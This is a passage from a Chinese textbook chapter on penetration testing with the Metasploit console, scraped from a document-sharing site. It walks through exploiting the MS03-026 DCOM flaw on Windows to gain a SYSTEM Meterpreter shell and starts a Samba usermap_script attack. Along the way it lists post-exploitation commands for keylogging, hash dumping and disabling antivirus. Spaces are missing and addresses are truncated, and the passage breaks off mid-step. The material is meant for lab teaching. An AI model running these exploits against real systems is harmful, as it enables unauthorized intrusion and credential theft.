版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報或認(rèn)領(lǐng)
文檔簡介
第6章
網(wǎng)絡(luò)安全滲透測試技術(shù)編著:
秦?zé)鰟诖浣?/p>
任務(wù)6.4.2通過命令行界面對服務(wù)器實施滲透測試
任務(wù)6.4.2通過命令行界面對服務(wù)器實施滲透測試
除了圖形界面,還可使用命令行界面的Metasploit框架版(TheMetasploitFramework,簡稱MSF),Metasploit框架版可以針對目標(biāo)的漏洞,提供相應(yīng)的發(fā)射器和惡意代碼。攻擊者采用發(fā)射器,可將惡意代碼發(fā)射到目標(biāo)主機(jī)上并隱蔽起來,惡意代碼可接受攻擊者的控制。一、Metasploit涉及的一些概念vulnerability:被攻擊主機(jī)上的漏洞、薄弱點。exploit:用于發(fā)射惡意代碼的發(fā)射器。利用被攻擊者的漏洞和弱點,發(fā)射器可將木馬等惡意代碼植入到被攻擊者主機(jī)。payload:是攻擊者用發(fā)射器發(fā)射并隱藏到被攻擊者主機(jī)內(nèi)惡意代碼,如木馬等。利用被攻擊者主機(jī)上的漏洞,攻擊者可使用exploit發(fā)射器發(fā)射惡意代碼payload,將惡意代碼payload發(fā)射到攻擊者的主機(jī),隱蔽的植入到被攻擊者主機(jī)內(nèi)部。Metasploit擁有大量優(yōu)秀的、在線更新的exploit和paylaod。其中,Meterpreter是眾多載荷中最受歡迎的payload。二、Metasploit框架結(jié)構(gòu)MSF的操作步驟。一)針對被攻擊者主機(jī)的漏洞,選擇用于發(fā)射惡意代碼的發(fā)射器exploit。1.search:查看可用的發(fā)射器exploits。2.use:選用合適的發(fā)射器exploits。二)選用攻擊載荷payload(如木馬等惡意代碼),并設(shè)置相關(guān)參數(shù)。1.showpayloads:查看所有可選的攻擊載荷(惡意代碼)。2.setpayload:從大量的攻擊載荷payloads中,選擇一個,一般選用Meterpreter作為攻擊載荷。3.showoptions:查看攻擊載荷的配置選項。4.set:設(shè)置攻擊載荷的配置選項、設(shè)置相關(guān)參數(shù)。三)查看適用的操作系統(tǒng)1.showtargets:查看所選的發(fā)射器和攻擊載荷適用的操作系統(tǒng)及版本,如果與被攻擊者的不符,則無法實施攻擊。2.settarget設(shè)置攻擊的操作系統(tǒng)。四)實施攻擊exploit:使用選好的發(fā)射器exploit和攻擊載荷payload,執(zhí)行滲透測試攻擊,效果和run一樣。參數(shù)–j表示攻擊在后臺進(jìn)行。以上是完整的步驟,根據(jù)實際情況,操作中可以省去其中某些步驟。三、攻擊載荷Meterpreter常用命令Meterpreter是最常用的攻擊載荷,其常用的命令如下:1.background回到后臺,即上一個命令提示符。2.sessions每個攻擊為一個會話,每個會話有一個唯一的ID,使用sessions命令可查看當(dāng)前有哪些會話,即有哪些主機(jī)被控制了。使用session-h命令可查看幫助信息。使用sessionsID命令可切換到指定的session會話。使用session-kID命令可關(guān)閉指定的session會話。3.screenshot對被攻擊主機(jī)截屏,保存到本地。4.sysinfo顯示被攻擊主機(jī)的系統(tǒng)信息。5.ps查看被攻擊主機(jī)正在運行的進(jìn)程。6.migrate將meterpreter遷移到相對穩(wěn)定的進(jìn)程中。7.runkeylogrecorder鍵盤記錄8.runhashdump收集被攻擊者主機(jī)的密碼哈希值9.runvnc打開被攻擊者主機(jī)的桌面10.runkillav關(guān)閉被攻擊者主機(jī)的殺毒軟件。四、對Windows服務(wù)器實施MS03-026漏洞攻擊上一小節(jié),我們通過Nessus掃描到了Windows服務(wù)器存在MS03-026漏洞。下面學(xué)習(xí)如何針對該已知漏洞,用命令行界面對目標(biāo)系統(tǒng)實施滲透測試攻擊。1.打開命令行界面,輸入msfconsole命令。root@kali:~/Downloads#msfconsole2.輸入searchms03-026命令,查找針對漏洞ms03-026的exploit發(fā)射器。msf>searchms03-026[!]Moduledatabasecachenotbuiltyet,usingslowsearchMatchingModules================NameDisclosureDateRankDescription-----------------------------------exploit/windows/dcerpc/ms03_026_dcom2003-07-16greatMS03-026MicrosoftRPCDCOMInterfaceOverflow查找到針對該漏洞的發(fā)射器:exploit/windows/dcerpc/ms03_026_dcom3.通過useexploit/windows/dcerpc/ms03_026_dcom命令,選用該exploit發(fā)射器。msf>useexploit/windows/dcerpc/ms03_026_dcom4.通過showpayloads命令,查看所有可選的攻擊載荷payload(惡意代碼)。msfexploit(windows/dcerpc/ms03_026_dcom)>showpayloads可以看到,可用的payload攻擊載荷很多。其中,windows/meterpreter/bind_tcp是kali主動聯(lián)系被攻擊者,如果要經(jīng)過防火墻,易被過濾掉,不容易成功;我們將采用windows/meterpreter/reverse_tcp,此時,受害者將主動聯(lián)系kali,防火墻一般會放行。5.將“windows/meterpreter/reverse_tcp”選為攻擊載荷。msfexploit(windows/dcerpc/ms03_026_dcom)>setpayloadwindows/meterpreter/reverse_tcppayload=>windows/meterpreter/reverse_tcp6.通過showoptions命令,查看攻擊載荷payload的配置選項。msfexploit(windows/dcerpc/ms03_026_dcom)>showoptionsModuleoptions(exploit/windows/dcerpc/ms03_026_dcom):NameCurrentSettingRequiredDescription--------------------------------------RHOSTyesThetargetaddressRPORT135yesThetargetport(TCP)Payloadoptions(windows/meterpreter/reverse_tcp):NameCurrentSettingRequiredDescription--------------------------------------EXITFUNCthreadyesExittechnique(Accepted:'',seh,thread,process,none)LHOSTyesThelistenaddressLPORT4444yesThelistenportExploittarget:IdName------0WindowsNTSP3-6a/2000/XP/2003Universal7.set:設(shè)置攻擊載荷的配置選項、設(shè)置相關(guān)參數(shù)。msfexploit(windows/dcerpc/ms03_026_dcom)>setrhost3rhost=>3msfexploit(windows/dcerpc/ms03_026_dcom)>setlhost1lhost=>1三)查看適用的操作系統(tǒng)1.showtargets:查看所選的發(fā)射器和攻擊載荷適用的操作系統(tǒng)及版本,如果與被攻擊者的不符,則無法實施攻擊。msfexploit(windows/dcerpc/ms03_026_dcom)>showtargetsExploittargets:IdName------0WindowsNTSP3-6a/2000/XP/2003Universal可見,ID號為0的target,適用的目標(biāo)操作系統(tǒng)及版本為WindowsNTSP3-6a/2000/XP/2003Universal。2.選用目標(biāo)操作系統(tǒng)對應(yīng)的ID號為0。msfexploit(windows/dcerpc/ms03_026_dcom)>settarget0target=>0四)實施攻擊1.exploit:使用選好的發(fā)射器exploit和攻擊載荷payload,執(zhí)行滲透測試攻擊。msfexploit(windows/dcerpc/ms03_026_dcom)>exploit[*]StartedreverseTCPhandleron1:4444[*]3:135-TryingtargetWindowsNTSP3-6a/2000/XP/2003Universal...[*]3:135-Bindingto4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:3[135]...[*]3:135-Boundto4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:3[135]...[*]3:135-Sendingexploit...[*]Sendingstage(179779bytes)to3[*]Sleepingbeforehandlingstage...[*]Meterpretersession1opened(1:4444->3:3177)at2018-12-3020:26:40-0500meterpreter>可以看到,攻擊成功,payload被發(fā)射到目標(biāo)系統(tǒng)中。五)操控被攻擊服務(wù)器1.查看被攻擊服務(wù)器的信息meterpreter>sysinfoComputer:ROOT-TVI862UBEHOS:Windows.NETServer(Build3790).Architecture:x86SystemLanguage:en_USDomain:WORKGROUPLoggedOnUsers:2Meterpreter:x86/windows2.進(jìn)入被攻擊服務(wù)器的命令行界面meterpreter>shellProcess2396created.Channel1created.MicrosoftWindows[Version5.2.3790](C)Copyright1985-2003MicrosoftCorp.3.執(zhí)行命令,操控被攻擊主機(jī),如執(zhí)行ipconfig等命令。C:\WINDOWS\system32>ipconfigipconfigWindowsIPConfigurationEthernetadapterLocalAreaConnection:Connection-specificDNSSuffix.:IPAddress............:3SubnetMask...........:DefaultGateway.........:C:\WINDOWS\system32>4.退出被攻擊主機(jī)的命令行界面C:\WINDOWS\system32>^CTerminatechannel1?[y/N]ymeterpreter>5.執(zhí)行backgroud命令,回到后臺,即上一個命令提示符。meterpreter>background[*]Backgroundingsession1...6.查看當(dāng)前sessions會話msfexploit(windows/dcerpc/ms03_026_dcom)>sessionsActivesessions===============IdNameTypeInformationConnection-------------------------------1meterpreterx86/windowsNTAUTHORITY\SYSTEM@ROOT-TVI862UBEH1:4444->3:3177(3)可以看到,目前只有一個會話,ID是1,被控制的目標(biāo)服務(wù)器是3。五、對Linux服務(wù)器實施samba漏洞攻擊1.打開命令行界面,輸入msfconsole命令。root@kali:~#msfconsole2.使用search命令從metasploit的滲透代碼庫中查找攻擊samba服務(wù)的exploit發(fā)射器。msf>searchsambaMatchingModules================NameDisclosureDateRankDescription----------------------------------……省略部分輸出……exploit/multi/samba/usermap_script2007-05-14excellentSamba"usernamemapscript"CommandExecution……省略部分輸出……我們從顯示的結(jié)果中,選擇exploit/multi/samba/usermap_script作為發(fā)射器。3.通過useexploit/multi/samba/usermap_script命令,選用該exploit發(fā)射器。msf>useexploit/multi/samba/usermap_scriptmsfexploit(multi/samba/usermap_script)>4.通過showpayloads命令,查看所有可選的攻擊載荷payload(惡意代碼)。msfexploit(multi/samba/usermap_script)>showpayloads在列出的眾多攻擊載荷中,我們選擇cmd/unix/bind_netcat。5.將“cmd/unix/bind_netcat”選為攻擊載荷。msfexploit(multi/samba/usermap_script)>setpayloadcmd/unix/bind_netcatpayload=>cmd/unix/bind_netcat6.通過showoptions命令,查看攻擊載荷(payload)的配置選項。msfexploit(multi/samba/usermap_script)>showoptionsModuleoptions(exploit/multi/samba/usermap_script):NameCurrentSettingRequiredDescription-----------------------------------
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 2025年度新型城鎮(zhèn)化項目宿舍建設(shè)承包合同4篇
- 2024銅門制安合同糾紛解決協(xié)議
- 2025年度醫(yī)院感染控制中心建設(shè)與承包合同4篇
- 2025年度智慧社區(qū)建設(shè)項目承包合作協(xié)議范文4篇
- 2025年度出租車行業(yè)駕駛員職業(yè)保險合作協(xié)議3篇
- 2025年度智能車庫使用權(quán)轉(zhuǎn)讓合同與范本4篇
- 2025年度智能化車庫租賃服務(wù)合同范本4篇
- 2024版熟石灰購銷協(xié)議范本
- 2025年度危險廢物承包裝卸處理協(xié)議4篇
- 2025年度智能穿戴設(shè)備租賃與健康管理服務(wù)合同4篇
- 二零二五年度無人駕駛車輛測試合同免責(zé)協(xié)議書
- 北京市海淀區(qū)2024-2025學(xué)年高一上學(xué)期期末考試歷史試題(含答案)
- 常用口服藥品的正確使用方法
- 2025年湖北華中科技大學(xué)招聘實驗技術(shù)人員52名歷年高頻重點提升(共500題)附帶答案詳解
- 2024年鉆探工程勞務(wù)協(xié)作協(xié)議樣式版B版
- 《心肺復(fù)蘇機(jī)救治院內(nèi)心搏驟停患者護(hù)理專家共識》解讀
- 計算機(jī)二級WPS考試試題
- 智聯(lián)招聘行測題庫及答案
- 前程無憂測評題庫及答案
- 2023中華護(hù)理學(xué)會團(tuán)體標(biāo)準(zhǔn)-注射相關(guān)感染預(yù)防與控制
- 超潔凈管道(CL-PVC)施工技術(shù)
評論
0/150
提交評論